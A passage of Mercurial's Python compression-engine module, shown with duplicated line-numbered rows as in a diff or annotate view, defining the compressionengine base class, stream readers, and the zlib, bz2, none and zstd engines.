3284 return engine
3284
3285
3285 def forbundletype(self, bundletype):
3286 def forbundletype(self, bundletype):
3286 """Obtain a compression engine registered to a bundle type.
3287 """Obtain a compression engine registered to a bundle type.
3287
3288
3288 Will raise KeyError if the bundle type isn't registered.
3289 Will raise KeyError if the bundle type isn't registered.
3289
3290
3290 Will abort if the engine is known but not available.
3291 Will abort if the engine is known but not available.
3291 """
3292 """
3292 engine = self._engines[self._bundletypes[bundletype]]
3293 engine = self._engines[self._bundletypes[bundletype]]
3293 if not engine.available():
3294 if not engine.available():
3294 raise error.Abort(_('compression engine %s could not be loaded') %
3295 raise error.Abort(_('compression engine %s could not be loaded') %
3295 engine.name())
3296 engine.name())
3296 return engine
3297 return engine
3297
3298
3298 def supportedwireengines(self, role, onlyavailable=True):
3299 def supportedwireengines(self, role, onlyavailable=True):
3299 """Obtain compression engines that support the wire protocol.
3300 """Obtain compression engines that support the wire protocol.
3300
3301
3301 Returns a list of engines in prioritized order, most desired first.
3302 Returns a list of engines in prioritized order, most desired first.
3302
3303
3303 If ``onlyavailable`` is set, filter out engines that can't be
3304 If ``onlyavailable`` is set, filter out engines that can't be
3304 loaded.
3305 loaded.
3305 """
3306 """
3306 assert role in (SERVERROLE, CLIENTROLE)
3307 assert role in (SERVERROLE, CLIENTROLE)
3307
3308
3308 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3309 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3309
3310
3310 engines = [self._engines[e] for e in self._wiretypes.values()]
3311 engines = [self._engines[e] for e in self._wiretypes.values()]
3311 if onlyavailable:
3312 if onlyavailable:
3312 engines = [e for e in engines if e.available()]
3313 engines = [e for e in engines if e.available()]
3313
3314
3314 def getkey(e):
3315 def getkey(e):
3315 # Sort first by priority, highest first. In case of tie, sort
3316 # Sort first by priority, highest first. In case of tie, sort
3316 # alphabetically. This is arbitrary, but ensures output is
3317 # alphabetically. This is arbitrary, but ensures output is
3317 # stable.
3318 # stable.
3318 w = e.wireprotosupport()
3319 w = e.wireprotosupport()
3319 return -1 * getattr(w, attr), w.name
3320 return -1 * getattr(w, attr), w.name
3320
3321
3321 return list(sorted(engines, key=getkey))
3322 return list(sorted(engines, key=getkey))
3322
3323
3323 def forwiretype(self, wiretype):
3324 def forwiretype(self, wiretype):
3324 engine = self._engines[self._wiretypes[wiretype]]
3325 engine = self._engines[self._wiretypes[wiretype]]
3325 if not engine.available():
3326 if not engine.available():
3326 raise error.Abort(_('compression engine %s could not be loaded') %
3327 raise error.Abort(_('compression engine %s could not be loaded') %
3327 engine.name())
3328 engine.name())
3328 return engine
3329 return engine
3329
3330
3330 def forrevlogheader(self, header):
3331 def forrevlogheader(self, header):
3331 """Obtain a compression engine registered to a revlog header.
3332 """Obtain a compression engine registered to a revlog header.
3332
3333
3333 Will raise KeyError if the revlog header value isn't registered.
3334 Will raise KeyError if the revlog header value isn't registered.
3334 """
3335 """
3335 return self._engines[self._revlogheaders[header]]
3336 return self._engines[self._revlogheaders[header]]
3336
3337
3337 compengines = compressormanager()
3338 compengines = compressormanager()
3338
3339
3339 class compressionengine(object):
3340 class compressionengine(object):
3340 """Base class for compression engines.
3341 """Base class for compression engines.
3341
3342
3342 Compression engines must implement the interface defined by this class.
3343 Compression engines must implement the interface defined by this class.
3343 """
3344 """
3344 def name(self):
3345 def name(self):
3345 """Returns the name of the compression engine.
3346 """Returns the name of the compression engine.
3346
3347
3347 This is the key the engine is registered under.
3348 This is the key the engine is registered under.
3348
3349
3349 This method must be implemented.
3350 This method must be implemented.
3350 """
3351 """
3351 raise NotImplementedError()
3352 raise NotImplementedError()
3352
3353
3353 def available(self):
3354 def available(self):
3354 """Whether the compression engine is available.
3355 """Whether the compression engine is available.
3355
3356
3356 The intent of this method is to allow optional compression engines
3357 The intent of this method is to allow optional compression engines
3357 that may not be available in all installations (such as engines relying
3358 that may not be available in all installations (such as engines relying
3358 on C extensions that may not be present).
3359 on C extensions that may not be present).
3359 """
3360 """
3360 return True
3361 return True
3361
3362
3362 def bundletype(self):
3363 def bundletype(self):
3363 """Describes bundle identifiers for this engine.
3364 """Describes bundle identifiers for this engine.
3364
3365
3365 If this compression engine isn't supported for bundles, returns None.
3366 If this compression engine isn't supported for bundles, returns None.
3366
3367
3367 If this engine can be used for bundles, returns a 2-tuple of strings of
3368 If this engine can be used for bundles, returns a 2-tuple of strings of
3368 the user-facing "bundle spec" compression name and an internal
3369 the user-facing "bundle spec" compression name and an internal
3369 identifier used to denote the compression format within bundles. To
3370 identifier used to denote the compression format within bundles. To
3370 exclude the name from external usage, set the first element to ``None``.
3371 exclude the name from external usage, set the first element to ``None``.
3371
3372
3372 If bundle compression is supported, the class must also implement
3373 If bundle compression is supported, the class must also implement
3373 ``compressstream`` and `decompressorreader``.
3374 ``compressstream`` and `decompressorreader``.
3374
3375
3375 The docstring of this method is used in the help system to tell users
3376 The docstring of this method is used in the help system to tell users
3376 about this engine.
3377 about this engine.
3377 """
3378 """
3378 return None
3379 return None
3379
3380
3380 def wireprotosupport(self):
3381 def wireprotosupport(self):
3381 """Declare support for this compression format on the wire protocol.
3382 """Declare support for this compression format on the wire protocol.
3382
3383
3383 If this compression engine isn't supported for compressing wire
3384 If this compression engine isn't supported for compressing wire
3384 protocol payloads, returns None.
3385 protocol payloads, returns None.
3385
3386
3386 Otherwise, returns ``compenginewireprotosupport`` with the following
3387 Otherwise, returns ``compenginewireprotosupport`` with the following
3387 fields:
3388 fields:
3388
3389
3389 * String format identifier
3390 * String format identifier
3390 * Integer priority for the server
3391 * Integer priority for the server
3391 * Integer priority for the client
3392 * Integer priority for the client
3392
3393
3393 The integer priorities are used to order the advertisement of format
3394 The integer priorities are used to order the advertisement of format
3394 support by server and client. The highest integer is advertised
3395 support by server and client. The highest integer is advertised
3395 first. Integers with non-positive values aren't advertised.
3396 first. Integers with non-positive values aren't advertised.
3396
3397
3397 The priority values are somewhat arbitrary and only used for default
3398 The priority values are somewhat arbitrary and only used for default
3398 ordering. The relative order can be changed via config options.
3399 ordering. The relative order can be changed via config options.
3399
3400
3400 If wire protocol compression is supported, the class must also implement
3401 If wire protocol compression is supported, the class must also implement
3401 ``compressstream`` and ``decompressorreader``.
3402 ``compressstream`` and ``decompressorreader``.
3402 """
3403 """
3403 return None
3404 return None
3404
3405
3405 def revlogheader(self):
3406 def revlogheader(self):
3406 """Header added to revlog chunks that identifies this engine.
3407 """Header added to revlog chunks that identifies this engine.
3407
3408
3408 If this engine can be used to compress revlogs, this method should
3409 If this engine can be used to compress revlogs, this method should
3409 return the bytes used to identify chunks compressed with this engine.
3410 return the bytes used to identify chunks compressed with this engine.
3410 Else, the method should return ``None`` to indicate it does not
3411 Else, the method should return ``None`` to indicate it does not
3411 participate in revlog compression.
3412 participate in revlog compression.
3412 """
3413 """
3413 return None
3414 return None
3414
3415
3415 def compressstream(self, it, opts=None):
3416 def compressstream(self, it, opts=None):
3416 """Compress an iterator of chunks.
3417 """Compress an iterator of chunks.
3417
3418
3418 The method receives an iterator (ideally a generator) of chunks of
3419 The method receives an iterator (ideally a generator) of chunks of
3419 bytes to be compressed. It returns an iterator (ideally a generator)
3420 bytes to be compressed. It returns an iterator (ideally a generator)
3420 of bytes of chunks representing the compressed output.
3421 of bytes of chunks representing the compressed output.
3421
3422
3422 Optionally accepts an argument defining how to perform compression.
3423 Optionally accepts an argument defining how to perform compression.
3423 Each engine treats this argument differently.
3424 Each engine treats this argument differently.
3424 """
3425 """
3425 raise NotImplementedError()
3426 raise NotImplementedError()
3426
3427
3427 def decompressorreader(self, fh):
3428 def decompressorreader(self, fh):
3428 """Perform decompression on a file object.
3429 """Perform decompression on a file object.
3429
3430
3430 Argument is an object with a ``read(size)`` method that returns
3431 Argument is an object with a ``read(size)`` method that returns
3431 compressed data. Return value is an object with a ``read(size)`` that
3432 compressed data. Return value is an object with a ``read(size)`` that
3432 returns uncompressed data.
3433 returns uncompressed data.
3433 """
3434 """
3434 raise NotImplementedError()
3435 raise NotImplementedError()
3435
3436
3436 def revlogcompressor(self, opts=None):
3437 def revlogcompressor(self, opts=None):
3437 """Obtain an object that can be used to compress revlog entries.
3438 """Obtain an object that can be used to compress revlog entries.
3438
3439
3439 The object has a ``compress(data)`` method that compresses binary
3440 The object has a ``compress(data)`` method that compresses binary
3440 data. This method returns compressed binary data or ``None`` if
3441 data. This method returns compressed binary data or ``None`` if
3441 the data could not be compressed (too small, not compressible, etc).
3442 the data could not be compressed (too small, not compressible, etc).
3442 The returned data should have a header uniquely identifying this
3443 The returned data should have a header uniquely identifying this
3443 compression format so decompression can be routed to this engine.
3444 compression format so decompression can be routed to this engine.
3444 This header should be identified by the ``revlogheader()`` return
3445 This header should be identified by the ``revlogheader()`` return
3445 value.
3446 value.
3446
3447
3447 The object has a ``decompress(data)`` method that decompresses
3448 The object has a ``decompress(data)`` method that decompresses
3448 data. The method will only be called if ``data`` begins with
3449 data. The method will only be called if ``data`` begins with
3449 ``revlogheader()``. The method should return the raw, uncompressed
3450 ``revlogheader()``. The method should return the raw, uncompressed
3450 data or raise a ``StorageError``.
3451 data or raise a ``StorageError``.
3451
3452
3452 The object is reusable but is not thread safe.
3453 The object is reusable but is not thread safe.
3453 """
3454 """
3454 raise NotImplementedError()
3455 raise NotImplementedError()
3455
3456
3456 class _CompressedStreamReader(object):
3457 class _CompressedStreamReader(object):
3457 def __init__(self, fh):
3458 def __init__(self, fh):
3458 if safehasattr(fh, 'unbufferedread'):
3459 if safehasattr(fh, 'unbufferedread'):
3459 self._reader = fh.unbufferedread
3460 self._reader = fh.unbufferedread
3460 else:
3461 else:
3461 self._reader = fh.read
3462 self._reader = fh.read
3462 self._pending = []
3463 self._pending = []
3463 self._pos = 0
3464 self._pos = 0
3464 self._eof = False
3465 self._eof = False
3465
3466
3466 def _decompress(self, chunk):
3467 def _decompress(self, chunk):
3467 raise NotImplementedError()
3468 raise NotImplementedError()
3468
3469
3469 def read(self, l):
3470 def read(self, l):
3470 buf = []
3471 buf = []
3471 while True:
3472 while True:
3472 while self._pending:
3473 while self._pending:
3473 if len(self._pending[0]) > l + self._pos:
3474 if len(self._pending[0]) > l + self._pos:
3474 newbuf = self._pending[0]
3475 newbuf = self._pending[0]
3475 buf.append(newbuf[self._pos:self._pos + l])
3476 buf.append(newbuf[self._pos:self._pos + l])
3476 self._pos += l
3477 self._pos += l
3477 return ''.join(buf)
3478 return ''.join(buf)
3478
3479
3479 newbuf = self._pending.pop(0)
3480 newbuf = self._pending.pop(0)
3480 if self._pos:
3481 if self._pos:
3481 buf.append(newbuf[self._pos:])
3482 buf.append(newbuf[self._pos:])
3482 l -= len(newbuf) - self._pos
3483 l -= len(newbuf) - self._pos
3483 else:
3484 else:
3484 buf.append(newbuf)
3485 buf.append(newbuf)
3485 l -= len(newbuf)
3486 l -= len(newbuf)
3486 self._pos = 0
3487 self._pos = 0
3487
3488
3488 if self._eof:
3489 if self._eof:
3489 return ''.join(buf)
3490 return ''.join(buf)
3490 chunk = self._reader(65536)
3491 chunk = self._reader(65536)
3491 self._decompress(chunk)
3492 self._decompress(chunk)
3492 if not chunk and not self._pending and not self._eof:
3493 if not chunk and not self._pending and not self._eof:
3493 # No progress and no new data, bail out
3494 # No progress and no new data, bail out
3494 return ''.join(buf)
3495 return ''.join(buf)
3495
3496
3496 class _GzipCompressedStreamReader(_CompressedStreamReader):
3497 class _GzipCompressedStreamReader(_CompressedStreamReader):
3497 def __init__(self, fh):
3498 def __init__(self, fh):
3498 super(_GzipCompressedStreamReader, self).__init__(fh)
3499 super(_GzipCompressedStreamReader, self).__init__(fh)
3499 self._decompobj = zlib.decompressobj()
3500 self._decompobj = zlib.decompressobj()
3500 def _decompress(self, chunk):
3501 def _decompress(self, chunk):
3501 newbuf = self._decompobj.decompress(chunk)
3502 newbuf = self._decompobj.decompress(chunk)
3502 if newbuf:
3503 if newbuf:
3503 self._pending.append(newbuf)
3504 self._pending.append(newbuf)
3504 d = self._decompobj.copy()
3505 d = self._decompobj.copy()
3505 try:
3506 try:
3506 d.decompress('x')
3507 d.decompress('x')
3507 d.flush()
3508 d.flush()
3508 if d.unused_data == 'x':
3509 if d.unused_data == 'x':
3509 self._eof = True
3510 self._eof = True
3510 except zlib.error:
3511 except zlib.error:
3511 pass
3512 pass
3512
3513
3513 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3514 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3514 def __init__(self, fh):
3515 def __init__(self, fh):
3515 super(_BZ2CompressedStreamReader, self).__init__(fh)
3516 super(_BZ2CompressedStreamReader, self).__init__(fh)
3516 self._decompobj = bz2.BZ2Decompressor()
3517 self._decompobj = bz2.BZ2Decompressor()
3517 def _decompress(self, chunk):
3518 def _decompress(self, chunk):
3518 newbuf = self._decompobj.decompress(chunk)
3519 newbuf = self._decompobj.decompress(chunk)
3519 if newbuf:
3520 if newbuf:
3520 self._pending.append(newbuf)
3521 self._pending.append(newbuf)
3521 try:
3522 try:
3522 while True:
3523 while True:
3523 newbuf = self._decompobj.decompress('')
3524 newbuf = self._decompobj.decompress('')
3524 if newbuf:
3525 if newbuf:
3525 self._pending.append(newbuf)
3526 self._pending.append(newbuf)
3526 else:
3527 else:
3527 break
3528 break
3528 except EOFError:
3529 except EOFError:
3529 self._eof = True
3530 self._eof = True
3530
3531
3531 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3532 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3532 def __init__(self, fh):
3533 def __init__(self, fh):
3533 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3534 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3534 newbuf = self._decompobj.decompress('BZ')
3535 newbuf = self._decompobj.decompress('BZ')
3535 if newbuf:
3536 if newbuf:
3536 self._pending.append(newbuf)
3537 self._pending.append(newbuf)
3537
3538
3538 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3539 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3539 def __init__(self, fh, zstd):
3540 def __init__(self, fh, zstd):
3540 super(_ZstdCompressedStreamReader, self).__init__(fh)
3541 super(_ZstdCompressedStreamReader, self).__init__(fh)
3541 self._zstd = zstd
3542 self._zstd = zstd
3542 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3543 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3543 def _decompress(self, chunk):
3544 def _decompress(self, chunk):
3544 newbuf = self._decompobj.decompress(chunk)
3545 newbuf = self._decompobj.decompress(chunk)
3545 if newbuf:
3546 if newbuf:
3546 self._pending.append(newbuf)
3547 self._pending.append(newbuf)
3547 try:
3548 try:
3548 while True:
3549 while True:
3549 newbuf = self._decompobj.decompress('')
3550 newbuf = self._decompobj.decompress('')
3550 if newbuf:
3551 if newbuf:
3551 self._pending.append(newbuf)
3552 self._pending.append(newbuf)
3552 else:
3553 else:
3553 break
3554 break
3554 except self._zstd.ZstdError:
3555 except self._zstd.ZstdError:
3555 self._eof = True
3556 self._eof = True
3556
3557
3557 class _zlibengine(compressionengine):
3558 class _zlibengine(compressionengine):
3558 def name(self):
3559 def name(self):
3559 return 'zlib'
3560 return 'zlib'
3560
3561
3561 def bundletype(self):
3562 def bundletype(self):
3562 """zlib compression using the DEFLATE algorithm.
3563 """zlib compression using the DEFLATE algorithm.
3563
3564
3564 All Mercurial clients should support this format. The compression
3565 All Mercurial clients should support this format. The compression
3565 algorithm strikes a reasonable balance between compression ratio
3566 algorithm strikes a reasonable balance between compression ratio
3566 and size.
3567 and size.
3567 """
3568 """
3568 return 'gzip', 'GZ'
3569 return 'gzip', 'GZ'
3569
3570
3570 def wireprotosupport(self):
3571 def wireprotosupport(self):
3571 return compewireprotosupport('zlib', 20, 20)
3572 return compewireprotosupport('zlib', 20, 20)
3572
3573
3573 def revlogheader(self):
3574 def revlogheader(self):
3574 return 'x'
3575 return 'x'
3575
3576
3576 def compressstream(self, it, opts=None):
3577 def compressstream(self, it, opts=None):
3577 opts = opts or {}
3578 opts = opts or {}
3578
3579
3579 z = zlib.compressobj(opts.get('level', -1))
3580 z = zlib.compressobj(opts.get('level', -1))
3580 for chunk in it:
3581 for chunk in it:
3581 data = z.compress(chunk)
3582 data = z.compress(chunk)
3582 # Not all calls to compress emit data. It is cheaper to inspect
3583 # Not all calls to compress emit data. It is cheaper to inspect
3583 # here than to feed empty chunks through generator.
3584 # here than to feed empty chunks through generator.
3584 if data:
3585 if data:
3585 yield data
3586 yield data
3586
3587
3587 yield z.flush()
3588 yield z.flush()
3588
3589
3589 def decompressorreader(self, fh):
3590 def decompressorreader(self, fh):
3590 return _GzipCompressedStreamReader(fh)
3591 return _GzipCompressedStreamReader(fh)
3591
3592
3592 class zlibrevlogcompressor(object):
3593 class zlibrevlogcompressor(object):
3593 def compress(self, data):
3594 def compress(self, data):
3594 insize = len(data)
3595 insize = len(data)
3595 # Caller handles empty input case.
3596 # Caller handles empty input case.
3596 assert insize > 0
3597 assert insize > 0
3597
3598
3598 if insize < 44:
3599 if insize < 44:
3599 return None
3600 return None
3600
3601
3601 elif insize <= 1000000:
3602 elif insize <= 1000000:
3602 compressed = zlib.compress(data)
3603 compressed = zlib.compress(data)
3603 if len(compressed) < insize:
3604 if len(compressed) < insize:
3604 return compressed
3605 return compressed
3605 return None
3606 return None
3606
3607
3607 # zlib makes an internal copy of the input buffer, doubling
3608 # zlib makes an internal copy of the input buffer, doubling
3608 # memory usage for large inputs. So do streaming compression
3609 # memory usage for large inputs. So do streaming compression
3609 # on large inputs.
3610 # on large inputs.
3610 else:
3611 else:
3611 z = zlib.compressobj()
3612 z = zlib.compressobj()
3612 parts = []
3613 parts = []
3613 pos = 0
3614 pos = 0
3614 while pos < insize:
3615 while pos < insize:
3615 pos2 = pos + 2**20
3616 pos2 = pos + 2**20
3616 parts.append(z.compress(data[pos:pos2]))
3617 parts.append(z.compress(data[pos:pos2]))
3617 pos = pos2
3618 pos = pos2
3618 parts.append(z.flush())
3619 parts.append(z.flush())
3619
3620
3620 if sum(map(len, parts)) < insize:
3621 if sum(map(len, parts)) < insize:
3621 return ''.join(parts)
3622 return ''.join(parts)
3622 return None
3623 return None
3623
3624
3624 def decompress(self, data):
3625 def decompress(self, data):
3625 try:
3626 try:
3626 return zlib.decompress(data)
3627 return zlib.decompress(data)
3627 except zlib.error as e:
3628 except zlib.error as e:
3628 raise error.StorageError(_('revlog decompress error: %s') %
3629 raise error.StorageError(_('revlog decompress error: %s') %
3629 stringutil.forcebytestr(e))
3630 stringutil.forcebytestr(e))
3630
3631
3631 def revlogcompressor(self, opts=None):
3632 def revlogcompressor(self, opts=None):
3632 return self.zlibrevlogcompressor()
3633 return self.zlibrevlogcompressor()
3633
3634
3634 compengines.register(_zlibengine())
3635 compengines.register(_zlibengine())
3635
3636
3636 class _bz2engine(compressionengine):
3637 class _bz2engine(compressionengine):
3637 def name(self):
3638 def name(self):
3638 return 'bz2'
3639 return 'bz2'
3639
3640
3640 def bundletype(self):
3641 def bundletype(self):
3641 """An algorithm that produces smaller bundles than ``gzip``.
3642 """An algorithm that produces smaller bundles than ``gzip``.
3642
3643
3643 All Mercurial clients should support this format.
3644 All Mercurial clients should support this format.
3644
3645
3645 This engine will likely produce smaller bundles than ``gzip`` but
3646 This engine will likely produce smaller bundles than ``gzip`` but
3646 will be significantly slower, both during compression and
3647 will be significantly slower, both during compression and
3647 decompression.
3648 decompression.
3648
3649
3649 If available, the ``zstd`` engine can yield similar or better
3650 If available, the ``zstd`` engine can yield similar or better
3650 compression at much higher speeds.
3651 compression at much higher speeds.
3651 """
3652 """
3652 return 'bzip2', 'BZ'
3653 return 'bzip2', 'BZ'
3653
3654
3654 # We declare a protocol name but don't advertise by default because
3655 # We declare a protocol name but don't advertise by default because
3655 # it is slow.
3656 # it is slow.
3656 def wireprotosupport(self):
3657 def wireprotosupport(self):
3657 return compewireprotosupport('bzip2', 0, 0)
3658 return compewireprotosupport('bzip2', 0, 0)
3658
3659
3659 def compressstream(self, it, opts=None):
3660 def compressstream(self, it, opts=None):
3660 opts = opts or {}
3661 opts = opts or {}
3661 z = bz2.BZ2Compressor(opts.get('level', 9))
3662 z = bz2.BZ2Compressor(opts.get('level', 9))
3662 for chunk in it:
3663 for chunk in it:
3663 data = z.compress(chunk)
3664 data = z.compress(chunk)
3664 if data:
3665 if data:
3665 yield data
3666 yield data
3666
3667
3667 yield z.flush()
3668 yield z.flush()
3668
3669
3669 def decompressorreader(self, fh):
3670 def decompressorreader(self, fh):
3670 return _BZ2CompressedStreamReader(fh)
3671 return _BZ2CompressedStreamReader(fh)
3671
3672
3672 compengines.register(_bz2engine())
3673 compengines.register(_bz2engine())
3673
3674
3674 class _truncatedbz2engine(compressionengine):
3675 class _truncatedbz2engine(compressionengine):
3675 def name(self):
3676 def name(self):
3676 return 'bz2truncated'
3677 return 'bz2truncated'
3677
3678
3678 def bundletype(self):
3679 def bundletype(self):
3679 return None, '_truncatedBZ'
3680 return None, '_truncatedBZ'
3680
3681
3681 # We don't implement compressstream because it is hackily handled elsewhere.
3682 # We don't implement compressstream because it is hackily handled elsewhere.
3682
3683
3683 def decompressorreader(self, fh):
3684 def decompressorreader(self, fh):
3684 return _TruncatedBZ2CompressedStreamReader(fh)
3685 return _TruncatedBZ2CompressedStreamReader(fh)
3685
3686
3686 compengines.register(_truncatedbz2engine())
3687 compengines.register(_truncatedbz2engine())
3687
3688
3688 class _noopengine(compressionengine):
3689 class _noopengine(compressionengine):
3689 def name(self):
3690 def name(self):
3690 return 'none'
3691 return 'none'
3691
3692
3692 def bundletype(self):
3693 def bundletype(self):
3693 """No compression is performed.
3694 """No compression is performed.
3694
3695
3695 Use this compression engine to explicitly disable compression.
3696 Use this compression engine to explicitly disable compression.
3696 """
3697 """
3697 return 'none', 'UN'
3698 return 'none', 'UN'
3698
3699
3699 # Clients always support uncompressed payloads. Servers don't because
3700 # Clients always support uncompressed payloads. Servers don't because
3700 # unless you are on a fast network, uncompressed payloads can easily
3701 # unless you are on a fast network, uncompressed payloads can easily
3701 # saturate your network pipe.
3702 # saturate your network pipe.
3702 def wireprotosupport(self):
3703 def wireprotosupport(self):
3703 return compewireprotosupport('none', 0, 10)
3704 return compewireprotosupport('none', 0, 10)
3704
3705
3705 # We don't implement revlogheader because it is handled specially
3706 # We don't implement revlogheader because it is handled specially
3706 # in the revlog class.
3707 # in the revlog class.
3707
3708
3708 def compressstream(self, it, opts=None):
3709 def compressstream(self, it, opts=None):
3709 return it
3710 return it
3710
3711
3711 def decompressorreader(self, fh):
3712 def decompressorreader(self, fh):
3712 return fh
3713 return fh
3713
3714
3714 class nooprevlogcompressor(object):
3715 class nooprevlogcompressor(object):
3715 def compress(self, data):
3716 def compress(self, data):
3716 return None
3717 return None
3717
3718
3718 def revlogcompressor(self, opts=None):
3719 def revlogcompressor(self, opts=None):
3719 return self.nooprevlogcompressor()
3720 return self.nooprevlogcompressor()
3720
3721
3721 compengines.register(_noopengine())
3722 compengines.register(_noopengine())
3722
3723
3723 class _zstdengine(compressionengine):
3724 class _zstdengine(compressionengine):
3724 def name(self):
3725 def name(self):
3725 return 'zstd'
3726 return 'zstd'
3726
3727
3727 @propertycache
3728 @propertycache
3728 def _module(self):
3729 def _module(self):
3729 # Not all installs have the zstd module available. So defer importing
3730 # Not all installs have the zstd module available. So defer importing
3730 # until first access.
3731 # until first access.
3731 try:
3732 try:
3732 from . import zstd
3733 from . import zstd
3733 # Force delayed import.
3734 # Force delayed import.
3734 zstd.__version__
3735 zstd.__version__
3735 return zstd
3736 return zstd
3736 except ImportError:
3737 except ImportError:
3737 return None
3738 return None
3738
3739
3739 def available(self):
3740 def available(self):
3740 return bool(self._module)
3741 return bool(self._module)
3741
3742
3742 def bundletype(self):
3743 def bundletype(self):
3743 """A modern compression algorithm that is fast and highly flexible.
3744 """A modern compression algorithm that is fast and highly flexible.
3744
3745
3745 Only supported by Mercurial 4.1 and newer clients.
3746 Only supported by Mercurial 4.1 and newer clients.
3746
3747
3747 With the default settings, zstd compression is both faster and yields
3748 With the default settings, zstd compression is both faster and yields
3748 better compression than ``gzip``. It also frequently yields better
3749 better compression than ``gzip``. It also frequently yields better
3749 compression than ``bzip2`` while operating at much higher speeds.
3750 compression than ``bzip2`` while operating at much higher speeds.
3750
3751
3751 If this engine is available and backwards compatibility is not a
3752 If this engine is available and backwards compatibility is not a
3752 concern, it is likely the best available engine.
3753 concern, it is likely the best available engine.
3753 """
3754 """
3754 return 'zstd', 'ZS'
3755 return 'zstd', 'ZS'
3755
3756
3756 def wireprotosupport(self):
3757 def wireprotosupport(self):
3757 return compewireprotosupport('zstd', 50, 50)
3758 return compewireprotosupport('zstd', 50, 50)
3758
3759
3759 def revlogheader(self):
3760 def revlogheader(self):
3760 return '\x28'
3761 return '\x28'
3761
3762
3762 def compressstream(self, it, opts=None):
3763 def compressstream(self, it, opts=None):
3763 opts = opts or {}
3764 opts = opts or {}
3764 # zstd level 3 is almost always significantly faster than zlib
3765 # zstd level 3 is almost always significantly faster than zlib
3765 # while providing no worse compression. It strikes a good balance
3766 # while providing no worse compression. It strikes a good balance
3766 # between speed and compression.
3767 # between speed and compression.
3767 level = opts.get('level', 3)
3768 level = opts.get('level', 3)
3768
3769
3769 zstd = self._module
3770 zstd = self._module
3770 z = zstd.ZstdCompressor(level=level).compressobj()
3771 z = zstd.ZstdCompressor(level=level).compressobj()
3771 for chunk in it:
3772 for chunk in it:
3772 data = z.compress(chunk)
3773 data = z.compress(chunk)
3773 if data:
3774 if data:
3774 yield data
3775 yield data
3775
3776
3776 yield z.flush()
3777 yield z.flush()
3777
3778
3778 def decompressorreader(self, fh):
3779 def decompressorreader(self, fh):
3779 return _ZstdCompressedStreamReader(fh, self._module)
3780 return _ZstdCompressedStreamReader(fh, self._module)
3780
3781
3781 class zstdrevlogcompressor(object):
3782 class zstdrevlogcompressor(object):
3782 def __init__(self, zstd, level=3):
3783 def __init__(self, zstd, level=3):
3783 # TODO consider omitting frame magic to save 4 bytes.
3784 # TODO consider omitting frame magic to save 4 bytes.
3784 # This writes content sizes into the frame header. That is
3785 # This writes content sizes into the frame header. That is
3785 # extra storage. But it allows a correct size memory allocation
3786 # extra storage. But it allows a correct size memory allocation
3786 # to hold the result.
3787 # to hold the result.
3787 self._cctx = zstd.ZstdCompressor(level=level)
3788 self._cctx = zstd.ZstdCompressor(level=level)
3788 self._dctx = zstd.ZstdDecompressor()
3789 self._dctx = zstd.ZstdDecompressor()
3789 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3790 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3790 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3791 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3791
3792
3792 def compress(self, data):
3793 def compress(self, data):
3793 insize = len(data)
3794 insize = len(data)
3794 # Caller handles empty input case.
3795 # Caller handles empty input case.
3795 assert insize > 0
3796 assert insize > 0
3796
3797
3797 if insize < 50:
3798 if insize < 50:
3798 return None
3799 return None
3799
3800
3800 elif insize <= 1000000:
3801 elif insize <= 1000000:
3801 compressed = self._cctx.compress(data)
3802 compressed = self._cctx.compress(data)
3802 if len(compressed) < insize:
3803 if len(compressed) < insize:
3803 return compressed
3804 return compressed
3804 return None
3805 return None
3805 else:
3806 else:
3806 z = self._cctx.compressobj()
3807 z = self._cctx.compressobj()
3807 chunks = []
3808 chunks = []
3808 pos = 0
3809 pos = 0
3809 while pos < insize:
3810 while pos < insize:
3810 pos2 = pos + self._compinsize
3811 pos2 = pos + self._compinsize
3811 chunk = z.compress(data[pos:pos2])
3812 chunk = z.compress(data[pos:pos2])
3812 if chunk:
3813 if chunk:
3813 chunks.append(chunk)
3814 chunks.append(chunk)
3814 pos = pos2
3815 pos = pos2
3815 chunks.append(z.flush())
3816 chunks.append(z.flush())
3816
3817
3817 if sum(map(len, chunks)) < insize:
3818 if sum(map(len, chunks)) < insize:
3818 return ''.join(chunks)
3819 return ''.join(chunks)
3819 return None
3820 return None
3820
3821
3821 def decompress(self, data):
3822 def decompress(self, data):
3822 insize = len(data)
3823 insize = len(data)
3823
3824
3824 try:
3825 try:
3825 # This was measured to be faster than other streaming
3826 # This was measured to be faster than other streaming
3826 # decompressors.
3827 # decompressors.
3827 dobj = self._dctx.decompressobj()
3828 dobj = self._dctx.decompressobj()
3828 chunks = []
3829 chunks = []
3829 pos = 0
3830 pos = 0
3830 while pos < insize:
3831 while pos < insize:
3831 pos2 = pos + self._decompinsize
3832 pos2 = pos + self._decompinsize
3832 chunk = dobj.decompress(data[pos:pos2])
3833 chunk = dobj.decompress(data[pos:pos2])
3833 if chunk:
3834 if chunk:
3834 chunks.append(chunk)
3835 chunks.append(chunk)
3835 pos = pos2
3836 pos = pos2
3836 # Frame should be exhausted, so no finish() API.
3837 # Frame should be exhausted, so no finish() API.
3837
3838
3838 return ''.join(chunks)
3839 return ''.join(chunks)
3839 except Exception as e:
3840 except Exception as e:
3840 raise error.StorageError(_('revlog decompress error: %s') %
3841 raise error.StorageError(_('revlog decompress error: %s') %
3841 stringutil.forcebytestr(e))
3842 stringutil.forcebytestr(e))
3842
3843
3843 def revlogcompressor(self, opts=None):
3844 def revlogcompressor(self, opts=None):
3844 opts = opts or {}
3845 opts = opts or {}
3845 return self.zstdrevlogcompressor(self._module,
3846 return self.zstdrevlogcompressor(self._module,
3846 level=opts.get('level', 3))
3847 level=opts.get('level', 3))
3847
3848
3848 compengines.register(_zstdengine())
3849 compengines.register(_zstdengine())
3849
3850
3850 def bundlecompressiontopics():
3851 def bundlecompressiontopics():
